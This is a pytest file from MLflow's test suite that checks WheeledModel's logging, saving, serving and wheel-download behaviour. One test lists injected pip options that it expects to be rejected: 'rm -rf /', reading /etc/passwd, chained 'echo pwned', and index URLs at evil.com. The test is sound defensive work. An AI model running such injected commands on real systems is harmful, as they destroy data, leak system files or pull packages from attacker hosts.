/ tests / models / test_wheeled_model.py
test_wheeled_model.py
  1  import os
  2  import random
  3  import re
  4  from io import BytesIO
  5  from typing import Any, NamedTuple
  6  from unittest import mock
  7  
  8  import numpy as np
  9  import pandas as pd
 10  import pytest
 11  import sklearn.neighbors as knn
 12  import yaml
 13  from sklearn import datasets
 14  
 15  import mlflow
 16  import mlflow.pyfunc.scoring_server as pyfunc_scoring_server
 17  from mlflow.exceptions import MlflowException
 18  from mlflow.models.model import METADATA_FILES
 19  from mlflow.models.utils import load_serving_example
 20  from mlflow.models.wheeled_model import _ORIGINAL_REQ_FILE_NAME, _WHEELS_FOLDER_NAME, WheeledModel
 21  from mlflow.pyfunc.model import MLMODEL_FILE_NAME, Model
 22  from mlflow.store.artifact.utils.models import _improper_model_uri_msg
 23  from mlflow.tracking.artifact_utils import _download_artifact_from_uri
 24  from mlflow.utils.environment import (
 25      _CONDA_ENV_FILE_NAME,
 26      _REQUIREMENTS_FILE_NAME,
 27      _is_pip_deps,
 28      _mlflow_conda_env,
 29  )
 30  
 31  from tests.helper_functions import (
 32      _is_available_on_pypi,
 33      _mlflow_major_version_string,
 34      pyfunc_serve_and_score_model,
 35  )
 36  
 37  EXTRA_PYFUNC_SERVING_TEST_ARGS = (
 38      [] if _is_available_on_pypi("scikit-learn", module="sklearn") else ["--env-manager", "local"]
 39  )
 40  
 41  
 42  class ModelWithData(NamedTuple):
 43      model: Any
 44      inference_data: Any
 45  
 46  
 47  @pytest.fixture(scope="module")
 48  def sklearn_knn_model():
 49      iris = datasets.load_iris()
 50      X = iris.data[:, :2]  # we only take the first two features.
 51      y = iris.target
 52      knn_model = knn.KNeighborsClassifier()
 53      knn_model.fit(X, y)
 54      return ModelWithData(model=knn_model, inference_data=X)
 55  
 56  
 57  def random_int(lo=1, hi=1000000000):
 58      return random.randint(int(lo), int(hi))
 59  
 60  
 61  def _get_list_from_file(path):
 62      with open(path) as file:
 63          return file.read().splitlines()
 64  
 65  
 66  def _get_pip_requirements_list(path):
 67      return _get_list_from_file(path)
 68  
 69  
 70  def get_pip_requirements_from_conda_file(conda_env_path):
 71      with open(conda_env_path) as f:
 72          conda_env = yaml.safe_load(f)
 73  
 74      conda_pip_requirements_list = []
 75      dependencies = conda_env.get("dependencies")
 76  
 77      for dependency in dependencies:
 78          if _is_pip_deps(dependency):
 79              conda_pip_requirements_list = dependency["pip"]
 80  
 81      return conda_pip_requirements_list
 82  
 83  
 84  def validate_updated_model_file(original_model_config, wheeled_model_config):
 85      differing_keys = {"run_id", "utc_time_created", "model_uuid", "artifact_path"}
 86      ignore_keys = {"model_id"}
 87  
 88      # Compare wheeled model configs with original model config (MLModel files)
 89      for key in original_model_config.keys() - ignore_keys:
 90          if key not in differing_keys:
 91              assert wheeled_model_config[key] == original_model_config[key]
 92          else:
 93              assert wheeled_model_config[key] != original_model_config[key]
 94  
 95      # Wheeled model key should only exist in wheeled_model_config
 96      assert wheeled_model_config.get(_WHEELS_FOLDER_NAME, None)
 97      assert not original_model_config.get(_WHEELS_FOLDER_NAME, None)
 98  
 99      # Every key in the original config should also exist in the wheeled config.
100      for key in original_model_config:
101          assert key in wheeled_model_config
102  
103  
104  def validate_updated_conda_dependencies(original_model_path, wheeled_model_path):
105      # Check if conda.yaml files of the original model and wheeled model are the same
106      # excluding the dependencies
107      wheeled_model_path = os.path.join(wheeled_model_path, _CONDA_ENV_FILE_NAME)
108      original_conda_env_path = os.path.join(original_model_path, _CONDA_ENV_FILE_NAME)
109  
110      with (
111          open(wheeled_model_path) as wheeled_conda_env,
112          open(original_conda_env_path) as original_conda_env,
113      ):
114          wheeled_conda_env = yaml.safe_load(wheeled_conda_env)
115          original_conda_env = yaml.safe_load(original_conda_env)
116  
117          for key in wheeled_conda_env:
118              if key != "dependencies":
119                  assert wheeled_conda_env[key] == original_conda_env[key]
120              else:
121                  assert wheeled_conda_env[key] != original_conda_env[key]
122  
123  
124  def validate_wheeled_dependencies(wheeled_model_path):
125      # Check if conda.yaml and requirements.txt are consistent
126      pip_requirements_path = os.path.join(wheeled_model_path, _REQUIREMENTS_FILE_NAME)
127      pip_requirements_list = _get_pip_requirements_list(pip_requirements_path)
128      conda_pip_requirements_list = get_pip_requirements_from_conda_file(
129          os.path.join(wheeled_model_path, _CONDA_ENV_FILE_NAME)
130      )
131  
132      pip_requirements_list.sort()
133      conda_pip_requirements_list.sort()
134      assert pip_requirements_list == conda_pip_requirements_list
135  
136      # Check if requirements.txt and wheels directory are consistent
137      wheels_dir = os.path.join(wheeled_model_path, _WHEELS_FOLDER_NAME)
138      wheels_list = []
139      for wheel_file in os.listdir(wheels_dir):
140          if wheel_file.endswith(".whl"):
141              relative_wheel_path = os.path.join(_WHEELS_FOLDER_NAME, wheel_file)
142              wheels_list.append(relative_wheel_path)
143  
144      wheels_list.sort()
145      assert wheels_list == pip_requirements_list
146  
147  
148  def test_model_log_load(tmp_path, sklearn_knn_model):
149      model_name = f"wheels-test-{random_int()}"
150      model_uri = f"models:/{model_name}/1"
151      wheeled_model_uri = f"models:/{model_name}/2"
152      artifact_path = "model"
153  
154      # Log a model
155      with mlflow.start_run():
156          mlflow.sklearn.log_model(
157              sklearn_knn_model.model,
158              name=artifact_path,
159              registered_model_name=model_name,
160          )
161          model_path = _download_artifact_from_uri(model_uri, tmp_path)
162          original_model_config = Model.load(os.path.join(model_path, MLMODEL_FILE_NAME)).__dict__
163  
164      # Re-log with wheels
165      with mlflow.start_run():
166          WheeledModel.log_model(model_uri=model_uri)
167          wheeled_model_path = _download_artifact_from_uri(wheeled_model_uri)
168          wheeled_model_run_id = mlflow.tracking.fluent._get_or_start_run().info.run_id
169          wheeled_model_config = Model.load(
170              os.path.join(wheeled_model_path, MLMODEL_FILE_NAME)
171          ).__dict__
172  
173      validate_updated_model_file(original_model_config, wheeled_model_config)
174      # Assert correct run_id
175      assert wheeled_model_config["run_id"] == wheeled_model_run_id
176  
177      validate_updated_conda_dependencies(model_path, wheeled_model_path)
178  
179      validate_wheeled_dependencies(wheeled_model_path)
180  
181  
182  def test_model_save_load(tmp_path, sklearn_knn_model):
183      model_name = f"wheels-test-{random_int()}"
184      model_uri = f"models:/{model_name}/1"
185      artifact_path = "model"
186      model_download_path = os.path.join(tmp_path, "m")
187      wheeled_model_path = os.path.join(tmp_path, "wm")
188  
189      os.mkdir(model_download_path)
190      # Log a model
191      with mlflow.start_run():
192          mlflow.sklearn.log_model(
193              sklearn_knn_model.model,
194              name=artifact_path,
195              registered_model_name=model_name,
196          )
197          model_path = _download_artifact_from_uri(model_uri, model_download_path)
198          original_model_config = Model.load(os.path.join(model_path, MLMODEL_FILE_NAME)).__dict__
199  
200      # Save with wheels
201      with mlflow.start_run():
202          wheeled_model = WheeledModel(model_uri=model_uri)
203          wheeled_model_data = wheeled_model.save_model(path=wheeled_model_path)
204          wheeled_model_config = Model.load(os.path.join(wheeled_model_path, MLMODEL_FILE_NAME))
205          wheeled_model_config_dict = wheeled_model_config.__dict__
206  
207          # Check to see if python model returned is the same as the MLModel file
208          assert wheeled_model_config == wheeled_model_data
209  
210      validate_updated_model_file(original_model_config, wheeled_model_config_dict)
211      validate_updated_conda_dependencies(model_path, wheeled_model_path)
212      validate_wheeled_dependencies(wheeled_model_path)
213  
214  
215  def test_logging_and_saving_wheeled_model_throws(tmp_path, sklearn_knn_model):
216      model_name = f"wheels-test-{random_int()}"
217      model_uri = f"models:/{model_name}/1"
218      wheeled_model_uri = f"models:/{model_name}/2"
219      artifact_path = "model"
220  
221      # Log a model
222      with mlflow.start_run():
223          mlflow.sklearn.log_model(
224              sklearn_knn_model.model,
225              name=artifact_path,
226              registered_model_name=model_name,
227          )
228  
229      # Re-log with wheels
230      with mlflow.start_run():
231          WheeledModel.log_model(
232              model_uri=model_uri,
233          )
234  
235      match = "Model libraries are already added"
236  
237      # Log wheeled model
238      with pytest.raises(MlflowException, match=re.escape(match)):
239          with mlflow.start_run():
240              WheeledModel.log_model(
241                  model_uri=wheeled_model_uri,
242              )
243  
244      # Saved a wheeled model
245      saved_model_path = os.path.join(tmp_path, "test")
246      with pytest.raises(MlflowException, match=re.escape(match)):
247          with mlflow.start_run():
248              WheeledModel(wheeled_model_uri).save_model(saved_model_path)
249  
250  
251  def test_log_model_with_non_model_uri():
252      model_uri = "runs:/beefe0b6b5bd4acf9938244cdc006b64/model"
253  
254      # Log with wheels
255      with pytest.raises(MlflowException, match=_improper_model_uri_msg(model_uri)):
256          with mlflow.start_run():
257              WheeledModel.log_model(
258                  model_uri=model_uri,
259              )
260  
261      # Save with wheels
262      with pytest.raises(MlflowException, match=_improper_model_uri_msg(model_uri)):
263          with mlflow.start_run():
264              WheeledModel(model_uri)
265  
266  
267  def test_create_pip_requirement(tmp_path):
268      expected_mlflow_version = _mlflow_major_version_string()
269      model_name = f"wheels-test-{random_int()}"
270      model_uri = f"models:/{model_name}/1"
271      conda_env_path = os.path.join(tmp_path, "conda.yaml")
272      pip_reqs_path = os.path.join(tmp_path, "requirements.txt")
273  
274      wm = WheeledModel(model_uri)
275  
276      expected_pip_deps = [expected_mlflow_version, "cloudpickle==2.1.0", "psutil==5.8.0"]
277      _mlflow_conda_env(
278          path=conda_env_path, additional_pip_deps=expected_pip_deps, install_mlflow=False
279      )
280      wm._create_pip_requirement(conda_env_path, pip_reqs_path)
281      with open(pip_reqs_path) as f:
282          pip_reqs = [x.strip() for x in f]
283      assert expected_pip_deps.sort() == pip_reqs.sort()
284  
285  
286  def test_update_conda_env_only_updates_pip_deps(tmp_path):
287      expected_mlflow_version = _mlflow_major_version_string()
288      model_name = f"wheels-test-{random_int()}"
289      model_uri = f"models:/{model_name}/1"
290      conda_env_path = os.path.join(tmp_path, "conda.yaml")
291      pip_deps = [expected_mlflow_version, "cloudpickle==2.1.0", "psutil==5.8.0"]
292      new_pip_deps = ["wheels/mlflow", "wheels/cloudpickle", "wheels/psutil"]
293  
294      wm = WheeledModel(model_uri)
295      additional_conda_deps = ["add_conda_deps"]
296      additional_conda_channels = ["add_conda_channels"]
297  
298      _mlflow_conda_env(
299          conda_env_path,
300          additional_conda_deps,
301          pip_deps,
302          additional_conda_channels,
303          install_mlflow=False,
304      )
305      with open(conda_env_path) as f:
306          old_conda_yaml = yaml.safe_load(f)
307      wm._update_conda_env(new_pip_deps, conda_env_path)
308      with open(conda_env_path) as f:
309          new_conda_yaml = yaml.safe_load(f)
310      assert old_conda_yaml.get("name") == new_conda_yaml.get("name")
311      assert old_conda_yaml.get("channels") == new_conda_yaml.get("channels")
312      for old_item, new_item in zip(
313          old_conda_yaml.get("dependencies"), new_conda_yaml.get("dependencies")
314      ):
315          if isinstance(old_item, str):
316              assert old_item == new_item
317          if isinstance(old_item, dict):
318              assert old_item.get("pip") == pip_deps
319          if isinstance(new_item, dict):
320              assert new_item.get("pip") == new_pip_deps
321  
322  
323  def test_serving_wheeled_model(sklearn_knn_model):
324      model_name = f"wheels-test-{random_int()}"
325      model_uri = f"models:/{model_name}/1"
326      wheeled_model_uri = f"models:/{model_name}/2"
327      artifact_path = "model"
328      (model, inference_data) = sklearn_knn_model
329  
330      # Log a model
331      with mlflow.start_run():
332          model_info = mlflow.sklearn.log_model(
333              model,
334              name=artifact_path,
335              registered_model_name=model_name,
336              input_example=pd.DataFrame(inference_data),
337          )
338  
339      # Re-log with wheels
340      with mlflow.start_run():
341          WheeledModel.log_model(model_uri=model_uri)
342  
343      inference_payload = load_serving_example(model_info.model_uri)
344      resp = pyfunc_serve_and_score_model(
345          wheeled_model_uri,
346          data=inference_payload,
347          content_type=pyfunc_scoring_server.CONTENT_TYPE_JSON,
348          extra_args=EXTRA_PYFUNC_SERVING_TEST_ARGS,
349      )
350      scores = pd.read_json(BytesIO(resp.content), orient="records").values.squeeze()
351      np.testing.assert_array_almost_equal(scores, model.predict(inference_data))
352  
353  
354  def test_wheel_download_works(tmp_path):
355      simple_dependency = "cloudpickle"
356      requirements_file = os.path.join(tmp_path, "req.txt")
357      wheel_dir = os.path.join(tmp_path, "wheels")
358      with open(requirements_file, "w") as req_file:
359          req_file.write(simple_dependency)
360  
361      WheeledModel._download_wheels(requirements_file, wheel_dir)
362      wheels = os.listdir(wheel_dir)
363      assert len(wheels) == 1  # Only a single wheel is downloaded
364      assert wheels[0].endswith(".whl")  # Type is wheel
365      assert simple_dependency in wheels[0]  # Cloudpickle wheel downloaded
366  
367  
368  def test_wheel_download_override_option_works(tmp_path, monkeypatch):
369      dependency = "pyspark"
370      requirements_file = os.path.join(tmp_path, "req.txt")
371      wheel_dir = os.path.join(tmp_path, "wheels")
372      with open(requirements_file, "w") as req_file:
373          req_file.write(dependency)
374  
375      # Default option fails to download wheel
376      with pytest.raises(
377          MlflowException, match="An error occurred while downloading the dependency wheels"
378      ):
379          WheeledModel._download_wheels(requirements_file, wheel_dir)
380  
381      # Set option override
382      monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")
383      WheeledModel._download_wheels(requirements_file, wheel_dir)
384      assert len(os.listdir(wheel_dir))  # Wheel dir is not empty
385  
386  
387  def test_wheel_download_dependency_conflicts(tmp_path):
388      reqs_file = tmp_path / "requirements.txt"
389      reqs_file.write_text("mlflow==2.15.0\nmlflow==2.16.0")
390      with pytest.raises(
391          MlflowException,
392          # Ensure the error message contains conflict details
393          match=r"Cannot install mlflow==2\.15\.0 and mlflow==2\.16\.0.+The conflict is caused by",
394      ):
395          WheeledModel._download_wheels(reqs_file, tmp_path / "wheels")
396  
397  
398  def test_copy_metadata(mock_is_in_databricks, sklearn_knn_model):
399      with mlflow.start_run():
400          mlflow.sklearn.log_model(
401              sklearn_knn_model.model,
402              name="model",
403              registered_model_name="sklearn_knn_model",
404          )
405  
406      with mlflow.start_run():
407          model_info = WheeledModel.log_model(model_uri="models:/sklearn_knn_model/1")
408  
409      artifact_path = mlflow.artifacts.download_artifacts(model_info.model_uri)
410      metadata_path = os.path.join(artifact_path, "metadata")
411      if mock_is_in_databricks.return_value:
412          assert set(os.listdir(metadata_path)) == set(METADATA_FILES + [_ORIGINAL_REQ_FILE_NAME])
413      else:
414          assert not os.path.exists(metadata_path)
415      assert mock_is_in_databricks.call_count == 2
416  
417  
418  def test_wheel_download_prevents_command_injection(tmp_path, monkeypatch):
419      malicious_attempts = [
420          "--only-binary=:all: && echo pwned",
421          "--prefer-binary; rm -rf /",
422          "--no-binary=:none: | cat /etc/passwd",
423          "../../../etc/passwd",
424          "--extra-index-url http://evil.com",
425          "--find-links /tmp",
426          "--index-url http://malicious.com",
427          "--trusted-host evil.com",
428          "--only-binary=package`rm -rf /`",
429          "--config-settings malicious=value",
430      ]
431  
432      for malicious_option in malicious_attempts:
433          monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", malicious_option)
434          with pytest.raises(MlflowException, match="Invalid pip wheel option"):
435              WheeledModel._download_wheels(tmp_path / "req.txt", tmp_path / "wheels")
436  
437  
438  def test_wheel_download_allowed_options(tmp_path, monkeypatch):
439      allowed_options = [
440          "--only-binary=:all:",
441          "--only-binary=:none:",
442          "--no-binary=:all:",
443          "--no-binary=:none:",
444          "--prefer-binary",
445          "--no-build-isolation",
446          "--use-pep517",
447          "--check-build-dependencies",
448          "--ignore-requires-python",
449          "--no-deps",
450          "--no-verify",
451          "--pre",
452          "--require-hashes",
453          "--no-clean",
454      ]
455  
456      for option in allowed_options:
457          monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", option)
458          with mock.patch("subprocess.run") as mock_run:
459              WheeledModel._download_wheels(tmp_path / "req.txt", tmp_path / "wheels")
460              mock_run.assert_called_once()
461              assert option in mock_run.call_args[0][0]
462  
463      # test combination of options
464      monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary --no-clean")
465      with mock.patch("subprocess.run") as mock_run:
466          WheeledModel._download_wheels(tmp_path / "req.txt", tmp_path / "wheels")
467          mock_run.assert_called_once()
468          call_args = mock_run.call_args
469          assert "--prefer-binary --no-clean" in call_args[0][0]
470  
471  
472  def test_wheel_download_extra_envs(tmp_path, monkeypatch):
473      monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")
474      extra_envs = {
475          "PIP_INDEX_URL": "https://test.pypi.org/simple/",
476          "PIP_TRUSTED_HOST": "test.pypi.org",
477          "CUSTOM_VAR": "test_value",
478      }
479  
480      with mock.patch("subprocess.run") as mock_run:
481          mock_run.return_value = mock.Mock(returncode=0)
482  
483          WheeledModel._download_wheels(
484              tmp_path / "req.txt", tmp_path / "wheels", extra_envs=extra_envs
485          )
486  
487          mock_run.assert_called_once()
488          call_args = mock_run.call_args
489          assert "--prefer-binary" in call_args[0][0]
490          passed_env = call_args[1]["env"]
491          assert passed_env["PIP_INDEX_URL"] == "https://test.pypi.org/simple/"
492          assert passed_env["PIP_TRUSTED_HOST"] == "test.pypi.org"
493          assert passed_env["CUSTOM_VAR"] == "test_value"
494  
495          # Verify original environment variables are preserved
496          assert passed_env["PATH"] == os.environ["PATH"]
497  
498  
499  def test_wheel_download_no_extra_envs(tmp_path, monkeypatch):
500      monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")
501  
502      with mock.patch("subprocess.run") as mock_run:
503          mock_run.return_value = mock.Mock(returncode=0)
504  
505          WheeledModel._download_wheels(tmp_path / "req.txt", tmp_path / "wheels", extra_envs=None)
506          mock_run.assert_called_once()
507          call_args = mock_run.call_args
508          assert call_args[1]["env"] is None